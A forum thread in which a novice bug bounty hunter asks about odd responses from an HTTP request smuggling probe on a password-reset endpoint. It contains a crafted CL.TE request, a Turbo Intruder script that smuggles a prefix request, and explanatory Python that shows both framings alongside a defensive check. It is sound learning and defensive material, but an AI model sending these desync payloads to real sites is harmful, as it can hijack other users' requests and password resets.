Security: Weird response when using Turbo Intruder

security, request, burp

I'm a bug bounty hunter and still new to it. A few days ago I read about the request smuggling vulnerability, and right after that I started looking for it on the web. Yesterday I found a website which, when I add X-Forwarded-Host: google.com to the headers, redirected me there. That is hard to exploit on its own, so I thought about combining it with request smuggling. I chose the change-password request as the target:

POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1

email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3

Then I ran it with Turbo Intruder. I was very surprised: it sent 14 requests, but only 12 of them got 503 and the remaining 2 got 200. In particular, the headers of the 200 responses contained ... Transfer-Encoding: chunked ... I tried several times and the result was always the same: 1 or 2 requests got 200. But there is one odd thing in the code, namely ... prefix = 'GET /hopefully404 HTTP/1.1 X-Ignore: X' ... After a few tests I think this is not a request smuggling bug, because the response shows that it is the response to the original request, not to the prefix in the code; I also tried changing the prefix and it was still 200 rather than 400 or 404 ... as I expected.


So, is there anyone, surely a very professional hacker, who knows what vulnerability I'm facing? Thanks, everyone!

First of all, your first converted request was chunked as TE;CL, but after using the Burp extension you found it as CL;TE, so the problem may lie there. As for the responses that have you a bit confused, I suggest you work through the PortSwigger HTTP request smuggling labs; I recently completed them myself, and your fundamentals will become very strong.

POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked

6b
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3



0

# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
def queueRequests(target, wordlists):

    # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0,
                           engine=Engine.THREADED,
                           )

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''

    # The request engine will auto-fix the content-length for us
    attack = target.req + prefix
    engine.queue(attack)

    victim = target.req
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.05)


def handleResponse(req, interesting):
    table.add(req)
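The request and script above, and the answer's point about CL.TE versus TE.CL, come down to two hops framing the same bytes differently. This added example is mine, not the asker's script or anything from Turbo Intruder or PortSwigger: it builds a constructed CL.TE request (shorter body, same /hopefully404 prefix as the script), frames it once by Content-Length and once by chunked encoding, and ends with the check a reverse proxy should apply, which is to reject a request carrying both framing headers instead of picking one.

```python
CRLF = b"\r\n"

# Constructed sample values (not from the page): a shorter form body than the
# real one, and the same smuggled 'prefix' the Turbo Intruder script uses.
BODY = b"email=victim%40example.com&submit=Reset"
PREFIX = b"GET /hopefully404 HTTP/1.1\r\nX-Ignore: X"

def build_cl_te_sample():
    """Chunked body followed by the prefix, with Content-Length spanning all
    of it (what Turbo Intruder's 'auto-fix the content-length' produces)."""
    chunked = b"%x\r\n%s\r\n0\r\n\r\n" % (len(BODY), BODY) + PREFIX
    return (b"POST /my-rx/forgot-password HTTP/1.1\r\n"
            b"Host: www.example.com\r\n"
            b"Transfer-Encoding: chunked\r\n"
            b"Content-Length: %d\r\n\r\n" % len(chunked)) + chunked

def parse_headers(raw):
    """Return (lower-cased header dict, offset where the body starts)."""
    head, _, _ = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, len(head) + 4

def frame_by_content_length(raw):
    """Front-end view: the body is exactly Content-Length bytes; returns
    (the request as this hop sees it, bytes left on the connection)."""
    headers, start = parse_headers(raw)
    end = start + int(headers.get(b"content-length", b"0"))
    return raw[:end], raw[end:]

def frame_by_chunked(raw):
    """Back-end view: the body ends after the zero-size chunk, so the
    leftover bytes become the start of the next request on the socket."""
    _, pos = parse_headers(raw)
    while True:
        size_line, _, _ = raw[pos:].partition(CRLF)
        size = int(size_line.split(b";")[0], 16)   # ignore chunk extensions
        pos += len(size_line) + 2
        if size == 0:
            return raw[:pos + 2], raw[pos + 2:]    # skip the empty trailer line
        pos += size + 2                            # chunk data plus its CRLF

def is_ambiguous(raw):
    """The check a proxy should apply: both framing headers present means
    the two hops may disagree, so rejecting is the safe choice."""
    headers, _ = parse_headers(raw)
    return b"content-length" in headers and b"transfer-encoding" in headers
```

For the sample, frame_by_content_length leaves nothing on the connection while frame_by_chunked leaves exactly PREFIX, which is the desync the script depends on and the reason the 12 other requests never see a clean connection.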